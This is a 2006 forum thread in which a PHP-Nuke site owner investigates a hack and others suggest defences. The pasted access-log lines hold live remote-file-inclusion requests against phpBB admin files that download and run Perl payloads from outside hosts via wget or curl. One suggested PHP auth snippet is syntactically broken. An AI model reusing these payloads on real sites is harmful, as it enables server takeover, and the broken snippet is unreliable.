Should Sentinel Pick these up ? !!

Hangin' Around Joined: May 09, 2004 Posts: 32

My site got hacked 2 days ago all posts were deleted on the forums so uploaded a DB backup and again same time yesterday post starting been deleting then they removed blocks and other stuff. The IP of the guy who was using my login details and admin were 80.193.176.196 !!

After checking my logs the only thing which was standing out at the time was this >>

222.124.193.3 - - [17/Aug/2006:17:28:56 +0100] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.osmozcafe.com/agenda/admin/backup/b.txt?&cmd HTTP/1.0" 200 364 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

Then after spending a good 1hr looking through 60k Lines !! I found this >>

217.73.200.24 - - [09/Aug/2006:18:35:20 +0100] "GET /modules/Forums/admin/admin_users.php?phpbb_root_path=www.undergroundhiphop.com/cmd.txt?&cmd=cd%20/tmp/;curl%20-O%20www.undergroundhiphop.com/phpnuke.txt;perl%20phpnuke.txt;rm%20-rf%20phpnuke.*? HTTP/1.0" 200 27 "-" "Mozilla/5.0"

200 lines of these types of strings with different URL’s all the below IP addresses are the ones who were doing it over the space of this last month.

87.106.15.181
86.203.4.132
85.90.137.142
85.17.48.90
83.217.84.73
83.166.193.241
83.149.71.73
82.207.114.11
82.138.17.101
81.24.17.133
80.96.166.154
80.202.56.4
66.94.82.111
66.42.206.202
64.34.5.10
64.240.166.241
62.253.128.15
61.19.55.250
222.124.193.3
217.73.200.24
217.24.244.133
217.20.127.17
217.12.49.1
216.75.30.69
216.32.68.234
213.167.155.32
212.98.165.220
212.91.134.133
212.138.47.20
212.138.47.15
212.138.113.23
211.21.63.47
211.75.219.154
210.87.251.111
210.87.251.107
210.87.251.106
203.146.102.59
203.113.132.116
202.85.42.140
194.44.12.3
194.105.26.26
193.91.75.11
193.110.186.240
163.32.230.2
140.130.101.32
128.42.61.59
222.124.193.3

So Should Sentinel pick these up ? Because it's not.

I'm on normal 7.7 Nuke and 2.0.21 forums.

Thanks

Andy

Posted: Tue Aug 29, 2006 5:37 am

That's good information, thanks.

So the main difference is that it's missing the "http://". Maybe that's what NS looks for and why it's slipping through?

Posted: Tue Aug 29, 2006 5:42 am

Good point, but i've just checked my logs again an there is ones with [ Only registered users can see links on this board! Get registered or login! ] in them !!

202.85.42.140 - - [10/Aug/2006:16:03:30 +0100] "GET /modules/Forums/admin/admin_users.php?phpbb_root_path=http://bardock.netfast.org/tool25.png?&cmd=cd%20/tmp/;wget%20http://www.tamashisound.it/httpds/phpnuke.txt;perl%20phpnuke.txt;rm%20-rf%20phpnuke.*? HTTP/1.0" 200 27 "-" "Mozilla/5.0"
203.146.102.59 - - [10/Aug/2006:16:03:35 +0100] "GET /modules/Forums/admin/admin_users.php?phpbb_root_path=http://www.tamashisound.it/httpds/tool.gif?&cmd=cd%20/tmp/;wget%20http://www.tamashisound.it/httpds/phpnuke.txt;perl%20phpnuke.txt;rm%20-rf%20phpnuke.*? HTTP/1.0" 200 27 "-" "Mozilla/5.0"
212.138.47.20 - - [16/Aug/2006:02:35:28 +0100] "GET /modules/Forums/admin/admin_users.php?phpbb_root_path=http://www.sale-ostrava.cz/tmp/httpd/cmd.txt?&cmd=cd%20/tmp/;lwp-download%20http://www.sale-ostrava.cz/tmp/httpd/phpnuke2.txt;perl%20phpnuke2.txt;rm%20-rf%20phpnuke2.*? HTTP/1.0" 200 27 "-" "Mozilla/5.0"

Thanks

Andy

Posted: Tue Aug 29, 2006 5:48 am

Hmmm ok. Well the experts/developers will be along soon and hopefully will shed some light on this. What version of NS are you running?

Posted: Tue Aug 29, 2006 5:52 am

NukeSentinel v2.5.0, Just seen the update to 2.5.1 but there is nothing in there to do with this type of hack attempts.

Thanks

Andy

Posted: Tue Aug 29, 2006 5:53 am

It's looking like the string "*.txt*" would be a good thing to block as well. There's at least some uniformity in all these hacks.

Posted: Tue Aug 29, 2006 5:55 am

Yep, a few redirects goto .png & .gifs first as well then on to the txt file, if you check the first txt file
[ Only registered users can see links on this board! Get registered or login! ]

You'll see all the code of one of them. ( Not sure if i can point this out at all on these forums or not, Delete if not )

Thanks

Andy

Posted: Tue Aug 29, 2006 6:35 am

Just to add to this and for a bit of help, how do you create a password on this topic here
[ Only registered users can see links on this board! Get registered or login! ]

everything works pop window comes up to put username and password in, but not sure how to create a working password.

Thanks

Andy

Posted: Tue Aug 29, 2006 7:45 am

Is this hack invisible to NukeSentinel because neither mainfile.php nor modules.php are called/invoked? Just guessing on my part, though.

Posted: Tue Aug 29, 2006 10:10 am

This exploit was hitting a bunch of sites a few months ago and was the reason for Raven's post that was given above by Panda.

If you want something quick-and-dirty, just use your same .staccess file from NukeSentinel to protect the forums. If you are not using CGIAuth for NS, then you'll have to generate the password using the crypt() function per the referenced thread from Raven's post.

Posted: Tue Aug 29, 2006 10:27 am

According to this exploit notice, this vulnerability dates back to 2005-05-05, or has been patched but re-introduced. Regardless, it still seems that NukeSentinel does NOT detect these exploits.

Posted: Tue Aug 29, 2006 11:37 am

All I can say is someone got into my site and used my logins and deleted all my forums posts then started deleting blocks and changing stuff. And all I can see on my logs is loads of those strings.

Then over the last few days a unknown IP started using my login details, and my passwords are not easy to remember and I don’t give out any of my stuff to no one not even my Wife !!

Andy.

Posted: Tue Aug 29, 2006 11:43 am

No one is questioning whether you got hacked or not. You need to apply the password protection mentioned above and after you have done that, change all your nuke and account passwords just to be on the safe side.

If your host using cpanel, you may even be able to apply a password on the modules/Forums/admin directory that way. I have done this successfully on at least one site.

Posted: Tue Aug 29, 2006 11:50 am

Sorry that wasn't a Rant.

Just me saying i think this is how they got in !! Cause nothing else is standing out to me and i don't know what you can do if you run that hack on someones site Admin wise.

I have changed all my passwords and setup the HTTP Authentication now so we'll see what happens.

Thanks

Andy

Posted: Tue Aug 29, 2006 4:43 pm

That should stop them in their tracks.... (for any and all Forum/admin file exploits).

Site Admin Joined: Jun 04, 2004 Posts: 6433

.txt doesn't matter - it could be named anything, though the unimaginative script kiddies are capable of much thought beyond how to copy someone else's attack script.

I'd request from the webhost that the offending site by taken down. Send a copy of your log message to the host with something along the lines of the script violating the terms of service.

As evaders pointed out, those files work outside the scope of NukeSentinel, so NukeSentinel can't stop it. However, using admin authentication, as montego pointed out, stops it quite effectively.

A quick and dirty approach is to simply rename your modules/Forums/admin directory, but you won't be able to adminster the Forums without changing it back.

Posted: Wed Aug 30, 2006 5:35 am

kguske wrote:

A quick and dirty approach is to simply rename your modules/Forums/admin directory, but you won't be able to adminster the Forums without changing it back.

As often as we really need to go in there, that might not be a bad idea. It only takes a second or two to rename it back.

Posted: Wed Aug 30, 2006 5:39 am

Keep in mind that a spider can still read the directory and find the new name, even though that's beyond what most script kiddies are capable of... The best approach is admin authentication.

Posted: Wed Aug 30, 2006 5:53 am

I understand that the admin auth and renaming folders will help to prevent these type of attacks. But is the real problem/exploit being remediated? Is this a phpBB issue, php-nuke issue, php issue or server issue? To whom should we look to for an actual patch of this vulnerability? Does (or will) the "Patched-series" fix this particular exploit?

Posted: Wed Aug 30, 2006 6:42 am

Here's another option - it will only protect access to the forum admin file itself.
I have NOT tested it, so use at your own risk but it should work.
In config.php add

Code:




$admin_user_name = 'yourusername';


$admin_user_pass = 'youradminpassword';


define('FORUM_PASS_AREA',True);

Make sure both of these do NOT match any exisiting usernames/passwords you are using.

In the forum admin file immediately below the copyright messages type in

Code:




while (!isset($_SERVER["PHP_AUTH_USER"])) {


   header("WWW-Authenticate: Basic realm=\"Forum Admin Area\"");


   header("HTTP/1.0 401 Unauthorized");


   echo "<h1>401 Unauthorized</h1><br />";


   echo "Try a little harder";


   exit();


}


if ($_SERVER["PHP_AUTH_USER"] == $admin_user_name && $_SERVER["PHP_AUTH_PW"] == $admin_user_pass && if (defined('FORUM_PASS_AREA')) {

Just before the php closing tag at the end of the file add on a new line

Code:

Posted: Wed Aug 30, 2006 7:56 am

oprime2001, to answer your questions:
But is the real problem/exploit being remediated? Yes, on several fronts.
Is this a phpBB issue, php-nuke issue, php issue or server issue? phpBB
To whom should we look to for an actual patch of this vulnerability? Bob Marion is trying to address it with NukeSentinel (latest versions may impact it), Raven addressed it with admin authentication, phpBB may address it, and NukeFixes may address it.
Does (or will) the "Patched-series" fix this particular exploit? Not sure if it's included yet, maybe Evaders can address this one.

Posted: Wed Aug 30, 2006 11:48 am

As of yet, I have not confirmed this vulnerability with the latest Patched files. The code looks right, and I cannot exploit it on my own system with Patched + 2.0.21 files...

If I could get immediate access to system that is Patched + 2.0.21 and still vulnerable, I would look into it ASAP. It may be something different in the system configurations... I'm just not sure.